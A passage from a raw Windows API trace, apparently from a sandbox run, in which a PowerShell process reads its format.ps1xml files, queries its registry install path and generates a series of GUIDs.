dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1e4 [0145.454] GetLastError () returned 0x0 [0145.454] GetFileType (hFile=0x1e4) returned 0x1 [0145.454] SetErrorMode (uMode=0x1) returned 0x1 [0145.454] GetFileType (hFile=0x1e4) returned 0x1 [0145.454] ReadFile (in: hFile=0x1e4, lpBuffer=0x326f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x326f448*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.472] GetLastError () returned 0x0 [0145.472] ReadFile (in: hFile=0x1e4, lpBuffer=0x326f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x326f448*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.480] GetLastError () returned 0x0 [0145.480] ReadFile (in: hFile=0x1e4, lpBuffer=0x326f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x326f448*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.480] GetLastError () returned 0x0 [0145.481] ReadFile (in: hFile=0x1e4, lpBuffer=0x326f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x326f448*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.481] GetLastError () returned 0x0 [0145.481] ReadFile (in: hFile=0x1e4, lpBuffer=0x326f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x326f448*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.481] GetLastError () returned 0x0 [0145.481] ReadFile (in: hFile=0x1e4, lpBuffer=0x326f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x326f448*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.481] GetLastError () returned 0x0 [0145.481] ReadFile (in: hFile=0x1e4, lpBuffer=0x326f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x326f448*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.481] GetLastError () returned 0x0 [0145.482] ReadFile (in: hFile=0x1e4, lpBuffer=0x326f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x326f448*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.482] GetLastError () returned 0x0 [0145.482] ReadFile (in: hFile=0x1e4, lpBuffer=0x326f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x326f448*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.482] GetLastError () returned 0x0 [0145.482] ReadFile (in: hFile=0x1e4, lpBuffer=0x326f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x326f448*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.482] GetLastError () returned 0x0 [0145.483] ReadFile (in: hFile=0x1e4, lpBuffer=0x326f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x326f448*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.483] GetLastError () returned 0x0 [0145.483] ReadFile (in: hFile=0x1e4, lpBuffer=0x326f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x326f448*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.483] GetLastError () returned 0x0 [0145.483] ReadFile (in: hFile=0x1e4, lpBuffer=0x326f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x326f448*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.483] GetLastError () returned 0x0 [0145.483] ReadFile (in: hFile=0x1e4, lpBuffer=0x326f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x326f448*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.483] GetLastError () returned 0x0 [0145.483] ReadFile (in: hFile=0x1e4, lpBuffer=0x326f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x326f448*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.483] GetLastError () returned 0x0 [0145.483] ReadFile (in: hFile=0x1e4, lpBuffer=0x326f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x326f448*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.483] GetLastError () returned 0x0 [0145.483] ReadFile (in: hFile=0x1e4, lpBuffer=0x326f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x326f448*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.483] GetLastError () returned 0x0 [0145.485] ReadFile (in: hFile=0x1e4, lpBuffer=0x326f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x326f448*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.485] GetLastError () returned 0x0 [0145.485] ReadFile (in: hFile=0x1e4, lpBuffer=0x326f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x326f448*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.485] GetLastError () returned 0x0 [0145.485] ReadFile (in: hFile=0x1e4, lpBuffer=0x326f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x326f448*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.485] GetLastError () returned 0x0 [0145.485] ReadFile (in: hFile=0x1e4, lpBuffer=0x326f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x326f448*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.486] GetLastError () returned 0x0 [0145.486] ReadFile (in: hFile=0x1e4, lpBuffer=0x326f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x326f448*, lpNumberOfBytesRead=0x24e2c4*=0xe67, lpOverlapped=0x0) returned 1 [0145.486] GetLastError () returned 0x0 [0145.486] ReadFile (in: hFile=0x1e4, lpBuffer=0x326ea4f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x326ea4f*, lpNumberOfBytesRead=0x24e2c4*=0x0, lpOverlapped=0x0) returned 1 [0145.486] GetLastError () returned 0x0 [0145.486] ReadFile (in: hFile=0x1e4, lpBuffer=0x326f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x326f448*, lpNumberOfBytesRead=0x24e2c4*=0x0, lpOverlapped=0x0) returned 1 [0145.486] GetLastError () returned 0x0 [0145.486] CloseHandle (hObject=0x1e4) returned 1 [0145.486] GetLastError () returned 0x0 [0145.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24de24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0145.486] GetLastError () returned 0x0 [0145.486] SetErrorMode (uMode=0x1) returned 0x1 [0145.486] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x328fcd8 | out: lpFileInformation=0x328fcd8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0145.487] GetLastError () returned 0x0 [0145.487] SetErrorMode (uMode=0x1) returned 0x1 [0145.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0145.487] GetLastError () returned 0x0 [0145.487] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e248 | out: phkResult=0x24e248*=0x1e4) returned 0x0 [0145.487] RegQueryValueExW (in: hKey=0x1e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e290, lpData=0x0, lpcbData=0x24e28c*=0x0 | out: lpType=0x24e290*=0x1, lpData=0x0, lpcbData=0x24e28c*=0x56) returned 0x0 [0145.487] RegQueryValueExW (in: hKey=0x1e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e290, lpData=0x338390, lpcbData=0x24e28c*=0x56 | out: lpType=0x24e290*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x24e28c*=0x56) returned 0x0 [0145.487] RegCloseKey (hKey=0x1e4) returned 0x0 [0145.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ddf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0145.487] GetLastError () returned 0x0 [0145.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24dd84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0145.488] GetLastError () returned 0x0 [0145.491] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x8bb253ab, Data2=0x389e, Data3=0x421c, Data4=([0]=0xa0, [1]=0xc5, [2]=0xad, [3]=0xdc, [4]=0xdf, [5]=0x3, [6]=0x4c, [7]=0x15))) returned 0x0 [0145.491] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xc42dd756, Data2=0xbb0, Data3=0x4ed6, Data4=([0]=0xb1, [1]=0x15, [2]=0x79, [3]=0x32, [4]=0x78, [5]=0x18, [6]=0xcf, [7]=0xdb))) returned 0x0 [0145.491] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xec8ad4c4, Data2=0xbca7, Data3=0x4c63, Data4=([0]=0x8c, [1]=0x76, [2]=0x23, [3]=0xbb, [4]=0x2f, [5]=0x69, [6]=0x33, [7]=0x5))) returned 0x0 [0145.491] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xfdb40bb5, Data2=0x9357, Data3=0x43a3, Data4=([0]=0xb7, [1]=0x99, [2]=0x31, [3]=0x22, [4]=0xad, [5]=0xc2, [6]=0xe3, [7]=0x8))) returned 0x0 [0145.491] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xadd66c57, Data2=0xd787, Data3=0x440d, Data4=([0]=0x82, [1]=0xe5, [2]=0xb2, [3]=0x9a, [4]=0xfe, [5]=0xa1, [6]=0x48, [7]=0x93))) returned 0x0 [0145.491] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x3a257c7f, Data2=0x186a, Data3=0x4a61, Data4=([0]=0x82, [1]=0x6f, [2]=0x40, [3]=0x4c, [4]=0xc, [5]=0x57, [6]=0x76, [7]=0x10))) returned 0x0 [0145.491] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xefe0640c, Data2=0xe916, Data3=0x4c7b, Data4=([0]=0x8d, [1]=0xe6, [2]=0x27, [3]=0x52, [4]=0x44, [5]=0x83, [6]=0xf5, [7]=0xce))) returned 0x0 [0145.492] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x43f93d8c, Data2=0xa083, Data3=0x43ca, Data4=([0]=0xb6, [1]=0x8e, [2]=0xd7, [3]=0x18, [4]=0x9d, [5]=0x58, [6]=0xf8, [7]=0x2b))) returned 0x0 [0145.492] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x52039cb3, Data2=0x62f1, Data3=0x4b10, Data4=([0]=0x8a, [1]=0x18, [2]=0xe1, [3]=0x72, [4]=0xe0, [5]=0x14, [6]=0x22, [7]=0x4c))) returned 0x0 [0145.492] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x2035af4b, Data2=0xc15d, Data3=0x4b02, Data4=([0]=0x9a, [1]=0xf2, [2]=0x96, [3]=0xe3, [4]=0x1f, [5]=0x84, [6]=0x66, [7]=0x70))) returned 0x0 [0145.492] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x42748db9, Data2=0x91b3, Data3=0x4d56, Data4=([0]=0xad, [1]=0x49, [2]=0xe5, [3]=0xb9, [4]=0xc4, [5]=0xb3, [6]=0xde, [7]=0x63))) returned 0x0 [0145.492] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xf6b03325, Data2=0xb684, Data3=0x4626, Data4=([0]=0xa1, [1]=0x10, [2]=0x52, [3]=0xe5, [4]=0xf4, [5]=0x3, [6]=0x4f, [7]=0xeb))) returned 0x0 [0145.492] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xdea75f89, Data2=0x4ea, Data3=0x4614, Data4=([0]=0xa0, [1]=0xe7, [2]=0x98, [3]=0xd3, [4]=0x89, [5]=0x7e, [6]=0x1f, [7]=0x35))) returned 0x0 [0145.492] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x3ccb6b4f, Data2=0x81dd, Data3=0x4a25, Data4=([0]=0xa6, [1]=0xea, [2]=0xda, [3]=0x72, [4]=0x78, [5]=0x2a, [6]=0x4d, [7]=0x52))) returned 0x0 [0145.493] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xa38535af, Data2=0x2f87, Data3=0x4c63, Data4=([0]=0x9a, [1]=0xa, [2]=0x33, [3]=0x39, [4]=0xc3, [5]=0x6d, [6]=0x6b, [7]=0x4e))) returned 0x0 [0145.493] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x11c299aa, Data2=0x619e, Data3=0x4c75, Data4=([0]=0xb0, [1]=0xf3, [2]=0xbd, [3]=0x2a, [4]=0x97, [5]=0xdd, [6]=0x32, [7]=0x47))) returned 0x0 [0145.493] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xa97995f6, Data2=0xed1b, Data3=0x414a, Data4=([0]=0xb5, [1]=0xee, [2]=0x7b, [3]=0xbd, [4]=0x2d, [5]=0x74, [6]=0xde, [7]=0x6f))) returned 0x0 [0145.493] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xe0fe44b0, Data2=0x794a, Data3=0x4a3e, Data4=([0]=0x9a, [1]=0x14, [2]=0xc8, [3]=0x8f, [4]=0x8b, [5]=0xbb, [6]=0x54, [7]=0xf0))) returned 0x0 [0145.493] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xce66b2b0, Data2=0xac52, Data3=0x4f68, Data4=([0]=0x81, [1]=0x52, [2]=0xac, [3]=0x12, [4]=0x86, [5]=0xb9, [6]=0x52, [7]=0x27))) returned 0x0 [0145.493] VirtualQuery (in: lpAddress=0x24cff0, lpBuffer=0x24dff0, dwLength=0x1c | out: lpBuffer=0x24dff0*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.494] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xdb9f166b, Data2=0x4f8e, Data3=0x49b7, Data4=([0]=0xb3, [1]=0xbd, [2]=0xf4, [3]=0x74, [4]=0xa7, [5]=0x19, [6]=0xf0, [7]=0x24))) returned 0x0 [0145.494] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xe15bcf0a, Data2=0x300f, Data3=0x43fd, Data4=([0]=0xa2, [1]=0xe, [2]=0x8, [3]=0x5, [4]=0x80, [5]=0x12, [6]=0xea, [7]=0x3))) returned 0x0 [0145.494] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xa4a42d3e, Data2=0xe4f2, Data3=0x471a, Data4=([0]=0x9f, [1]=0xe5, [2]=0x38, [3]=0x7e, [4]=0x40, [5]=0xf6, [6]=0x37, [7]=0x61))) returned 0x0 [0145.495] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x97c695, Data2=0x8807, Data3=0x4764, Data4=([0]=0x9d, [1]=0x4, [2]=0x93, [3]=0x2f, [4]=0xbe, [5]=0x93, [6]=0xf4, [7]=0xeb))) returned 0x0 [0145.495] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x2c1cdbd0, Data2=0x2605, Data3=0x4b39, Data4=([0]=0x9b, [1]=0x66, [2]=0xe1, [3]=0x6a, [4]=0x68, [5]=0x7d, [6]=0x53, [7]=0xe5))) returned 0x0 [0145.495] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xd0257e95, Data2=0xe628, Data3=0x45b4, Data4=([0]=0x95, [1]=0x2a, [2]=0x33, [3]=0xfb, [4]=0xaa, [5]=0x21, [6]=0xa7, [7]=0x4c))) returned 0x0 [0145.495] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x69288187, Data2=0x5ec5, Data3=0x41ce, Data4=([0]=0xae, [1]=0x39, [2]=0x6e, [3]=0xcc, [4]=0x82, [5]=0x4d, [6]=0x8e, [7]=0x4a))) returned 0x0 [0145.495] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x870587e8, Data2=0xf858, Data3=0x4ff4, Data4=([0]=0xb5, [1]=0x3b, [2]=0xb2, [3]=0x74, [4]=0xa3, [5]=0x5f, [6]=0x4e, [7]=0xa4))) returned 0x0 [0145.495] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x87c87513, Data2=0x3ca7, Data3=0x4d3e, Data4=([0]=0xa6, [1]=0xc, [2]=0x11, [3]=0x4b, [4]=0x76, [5]=0xa3, [6]=0x6, [7]=0xf2))) returned 0x0 [0145.495] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x1a1218b, Data2=0x9318, Data3=0x46f2, Data4=([0]=0x93, [1]=0x67, [2]=0x86, [3]=0xc3, [4]=0x65, [5]=0x91, [6]=0x82, [7]=0x79))) returned 0x0 [0145.496] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x18ecf412, Data2=0x2ae, Data3=0x4006, Data4=([0]=0x9d, [1]=0xab, [2]=0xce, [3]=0x97, [4]=0x63, [5]=0xb2, [6]=0x5d, [7]=0x14))) returned 0x0 [0145.496] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xf4dda8b6, Data2=0x91fa, Data3=0x4e0b, Data4=([0]=0xa5, [1]=0x26, [2]=0x5, [3]=0x1d, [4]=0xaa, [5]=0xb4, [6]=0xe0, [7]=0xd1))) returned 0x0 [0145.496] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x5a69b96c, Data2=0x278b, Data3=0x414b, Data4=([0]=0x9b, [1]=0x8e, [2]=0xf5, [3]=0x2a, [4]=0xf5, [5]=0xad, [6]=0xa1, [7]=0xc1))) returned 0x0 [0145.496] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x2837fc4e, Data2=0x68ce, Data3=0x4c9f, Data4=([0]=0xae, [1]=0xf5, [2]=0x27, [3]=0xd4, [4]=0xac, [5]=0xd9, [6]=0xfe, [7]=0x39))) returned 0x0 [0145.499] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x76cab406, Data2=0xc5fd, Data3=0x446d, Data4=([0]=0x84, [1]=0xb6, [2]=0xf8, [3]=0x70, [4]=0x5d, [5]=0x7c, [6]=0x9b, [7]=0xcc))) returned 0x0 [0145.500] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x70ac974c, Data2=0x8305, Data3=0x4050, Data4=([0]=0xae, [1]=0xa6, [2]=0x8b, [3]=0xcd, [4]=0x39, [5]=0x51, [6]=0x78, [7]=0x12))) returned 0x0 [0145.500] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x8d1ab1dd, Data2=0x9c1d, Data3=0x4c44, Data4=([0]=0xa7, [1]=0xd8, [2]=0x43, [3]=0xf, [4]=0x92, [5]=0x69, [6]=0x18, [7]=0xbf))) returned 0x0 [0145.500] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x937606ea, Data2=0x6ee3, Data3=0x474d, Data4=([0]=0x85, [1]=0xec, [2]=0x7b, [3]=0xc2, [4]=0x14, [5]=0xd, [6]=0x48, [7]=0x16))) returned 0x0 [0145.500] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x8cf9b480, Data2=0xc22a, Data3=0x4467, Data4=([0]=0xb6, [1]=0x1c, [2]=0x8f, [3]=0xf4, [4]=0x77, [5]=0x86, [6]=0x68, [7]=0xb6))) returned 0x0 [0145.500] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x1ffd6074, Data2=0xf973, Data3=0x46ca, Data4=([0]=0xa5, [1]=0x72, [2]=0x49, [3]=0x4e, [4]=0x9b, [5]=0x14, [6]=0x2a, [7]=0x28))) returned 0x0 [0145.500] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x664072ed, Data2=0x3101, Data3=0x4686, Data4=([0]=0x99, [1]=0xdf, [2]=0x83, [3]=0x24, [4]=0xe4, [5]=0x2a, [6]=0xe, [7]=0xc2))) returned 0x0 [0145.501] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x7becd8c1, Data2=0x87ec, Data3=0x4c52, Data4=([0]=0xa5, [1]=0xaa, [2]=0xd, [3]=0xa9, [4]=0x77, [5]=0xf1, [6]=0x59, [7]=0xb6))) returned 0x0 [0145.501] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x81867ae5, Data2=0x7b8, Data3=0x45c8, Data4=([0]=0x99, [1]=0xf2, [2]=0xa6, [3]=0x52, [4]=0x18, [5]=0xd6, [6]=0x76, [7]=0x78))) returned 0x0 [0145.501] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x12692caa, Data2=0xf4e2, Data3=0x430b, Data4=([0]=0xa3, [1]=0x24, [2]=0x98, [3]=0xa6, [4]=0x5f, [5]=0x2e, [6]=0xcd, [7]=0x37))) returned 0x0 [0145.501] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x4382554c, Data2=0xfccf, Data3=0x471a, Data4=([0]=0x84, [1]=0x82, [2]=0x6f, [3]=0x4c, [4]=0xbd, [5]=0x64, [6]=0xf, [7]=0xbd))) returned 0x0 [0145.501] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xc0aefdc9, Data2=0xfc6c, Data3=0x4d60, Data4=([0]=0xb0, [1]=0x40, [2]=0xec, [3]=0x99, [4]=0x8b, [5]=0x22, [6]=0xe, [7]=0x7e))) returned 0x0 [0145.502] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0x733ccc4, Data2=0xe20, Data3=0x4e42, Data4=([0]=0xa8, [1]=0xed, [2]=0xb9, [3]=0x84, [4]=0x1f, [5]=0x19, [6]=0x4c, [7]=0x8e))) returned 0x0 [0145.502] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xd3e5f8b9, Data2=0x3fde, Data3=0x4e6f, Data4=([0]=0xa5, [1]=0xa9, [2]=0xaa, [3]=0xf0, [4]=0xbe, [5]=0x8a, [6]=0xae, [7]=0xfb))) returned 0x0 [0145.502] CoCreateGuid (in: pguid=0x24e2b8 | out: pguid=0x24e2b8*(Data1=0xd29fe168, Data2=0xa8ef, Data3=0x477e, Data4=([0]=0x9f, [1]=0x12, [2]=0xb1, [3]=0xfd, [4]=0x6b, [5]=0xf6, [6]=0x80, [7]=0x91))) returned 0x0 [0145.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24dd5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0145.502] GetLastError () returned 0x0 [0145.502] SetErrorMode (uMode=0x1) returned 0x1 [0145.503] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1e4 [0145.503] GetLastError () returned 0x0 [0145.503] GetFileType (hFile=0x1e4) returned 0x1 [0145.503] SetErrorMode (uMode=0x1) returned 0x1 [0145.503] GetFileType (hFile=0x1e4) returned 0x1 [0145.503] ReadFile (in: hFile=0x1e4, lpBuffer=0x335fe20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x335fe20*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.524] GetLastError () returned 0x0 [0145.524] ReadFile (in: hFile=0x1e4, lpBuffer=0x335fe20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x335fe20*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.524] GetLastError () returned 0x0 [0145.524] ReadFile (in: hFile=0x1e4, lpBuffer=0x335fe20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x335fe20*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.524] GetLastError () returned 0x0 [0145.524] ReadFile (in: hFile=0x1e4, lpBuffer=0x335fe20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e2c4, lpOverlapped=0x0 | out: lpBuffer=0x335fe20*, lpNumberOfBytesRead=0x24e2c4*=0x1000, lpOverlapped=0x0) returned 1 [0145.524] GetLastError () returned 0x0 [0145.525] ReadFile (in: hFile=0x1e4, lpBuffer=0x335fe20, nNumberOfBytesToRead=0x1000, 